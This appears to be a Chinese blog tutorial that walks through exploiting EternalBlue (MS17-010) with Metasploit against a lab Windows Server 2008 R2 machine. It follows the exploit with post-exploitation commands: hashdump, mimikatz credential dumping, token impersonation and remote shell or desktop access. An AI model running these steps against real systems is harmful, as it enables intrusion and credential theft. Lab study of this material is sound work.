【漏洞工具】Metasploit框架永恒之蓝

MSF - 永恒之蓝ms17漏洞利用

  • 环境:windows server 2008 R2

  • 第一步、搜索ms17-010的漏洞辅助扫描工具

    • image-20210618082235168
  • 第二步、use该辅助模块

    • image-20210618082325376
  • 第三步、设置攻击参数,Rhost这是攻击主机的ip地址,永恒之蓝就是攻击445端口

    • image-20210618082527325
    • image-20210618082600801
  • 第四步、搜索exploit关于ms17-010,然后找到永恒之蓝

    • image-20210618082739059
    • image-20210618082904198
  • 第五步、找payload,windows反连payload 也就是windows/meterpreter/reverse_tcp

    • image-20210618083429422

    • image-20210618083601528

    • 第一次尝试,虚拟机挂了

    • image-20210618130220362

    • image-20210618085119005

    • 第二次尝试成功

    • image-20210618115140048

  • 建议会话之后的命令使用

    • getlwd – 显示本地工作目录

      • image-20210618200541943
    • ipconfig --显示网络接口信息

      • image-20210618200657205
    • ps --列出正在运行的程序

      • image-20210618200717296
    • migrate – 根据ps查看的pid可以任意迁移平行权限和下行权限

      • image-20210618200829834
      • image-20210618200937038
      • sysinfo --获取远程系统有关信息
        • image-20210618201053573
      • 提权和密码命令
        • getsystem(尝试简单提权)
          • image-20210618201334096
        • hashdump(获取hash密码)
          • image-20210618201408765
      • screenshot (获取远程桌面图片)
        • image-20210618201723492
        • image-20210618201749166
    • shell(感觉比较实用的一个了)

      • image-20210618201834813
      • image-20210618201936506
  • mimikatz(被换了个名字kiwi)抓取管理员账号和密码方式

    • load -l (查看可用模块)

      • image-20210618202215220
    • image-20210618202236991

    • 使用命令(kiwi_cmd sekurlsa::logonpasswords)

      • image-20210618202635214
      • image-20210618202739496
  • 远程CMD命令执行

    • execute -f cmd -c
    • image-20210619165901762
    • image-20210619165918970
  • 木马模式调到后台执行

    • background

  • 木马调回前台

    • session -l

      • image-20210619170225259
  • 令牌操纵

  • use incognito #heip incognito 查看帮助

    • image-20210619170849281
  • list_tokens -u 查看可用的token

    • image-20210619170901610
  • impersonate_token “伪造的身份” #假冒token 或者

    • 举个例子:impersonate_token NT AUTHORITY\SYSTEM #不加单引号 需使用\
  • execute -f cmd.exe -i –t # -t 使用假冒的token 执行 或者直接shell

    • image-20210619171137897
  • 登陆靶机电脑

    rdesktop -u 用户名 -p 密码 登陆ip地址
    
    • image-20210619171255577
    • image-20210619171334541
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孤桜懶契

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值